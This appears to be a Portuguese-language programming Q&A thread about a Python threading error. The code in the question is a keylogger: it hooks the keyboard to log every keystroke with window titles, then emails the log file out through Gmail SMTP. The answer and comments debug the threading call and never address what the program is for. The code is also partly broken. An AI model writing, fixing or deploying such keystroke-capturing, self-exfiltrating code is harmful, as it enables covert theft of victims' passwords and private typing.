# TypeError: send_email() takes exactly 1 argument (0 given)

Tags: python

Tenho um código e preciso usar threads, mas sempre como rodo as threads dá esse erro.

```
import pyHook
import pythoncom
import os
import threading
import time
import tempfile
import datetime
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email import encoders


def function(event, janela):
    arquivo = open('log.txt', 'a')
    with open(arquivo, 'a') as stream:
        if event.WindowsName != janela:
            janela = event.WindowsName
            stream.write('\n' + janela + ' - ' + str(event.Time) + '\n')
        stream.write(chr(event.Ascii))
    return janela


def pump():
    hook = pyHook.HookManager()
    hook.KeyDown = function
    hook.HookKeyboard()
    pythoncom.PumpMessages()


def send_email(arquivo):
    time.sleep(5)
    email_user = ''
    email_password = ''
    email_send = ''
    subject = '' + str(datetime.date.today())
    msg = MIMEMultipart()
    msg['From'] = email_user
    msg['To'] = email_send
    msg['Subject'] = subject
    body = '[*] Logs file uploaded successfully!'
    msg.attach(MIMEText(body, 'plain'))
    filename = arquivo
    attachment = open(arquivo, 'rb')
    part = MIMEBase('application', 'octet-stream')
    part.set_payload((attachment).read())
    encoders.encode_base64(part)
    part.add_header('Content-Disposition', "attachment; filename= " + filename)
    msg.attach(part)
    text = msg.as_string()
    server = smtplib.SMTP('smtp.gmail.com', 587)
    server.starttls()
    server.login(email_user, email_password)
    server.sendmail(email_user, email_send, text)
    server.quit()


w1 = threading.Thread(target=send_email(), args=[])
w = threading.Thread(target=pump())

w.start()
w1.start()
```

Answer (score 0):

Ao tentar criar a *thread* você está invocando a função, enquanto o correto seria apenas passar o objeto que representa a função.

Troque:

```
w1 = threading.Thread(target=send_email(), args=[])
```

Por:

```
w1 = threading.Thread(target=send_email, args=[arquivo])
# Foram retirados os parenteses -------^          ^
# Foi adicionado o arquivo a ser enviado ---------+
```

O mesmo para `pump`. Perceba que também adicionei em `args` o objeto que representa o arquivo que será enviado por e-mail, que será passado como parâmetro para a função quando a *thread* for executada. Com o parenteses, você está fazendo a chamada à função, porém, como a função espera um parâmetro que não está sendo passado, dá o erro citado.

Comment: w1 = threading.Thread(target=send_email, args=[arquivo])
NameError: name 'arquivo' is not defined

Comment: Obviamente que este erro iria ocorrer; foi apenas um exemplo. Você precisa definir devidamente em seu código o objeto `arquivo` com o arquivo que deseja enviar por e-mail.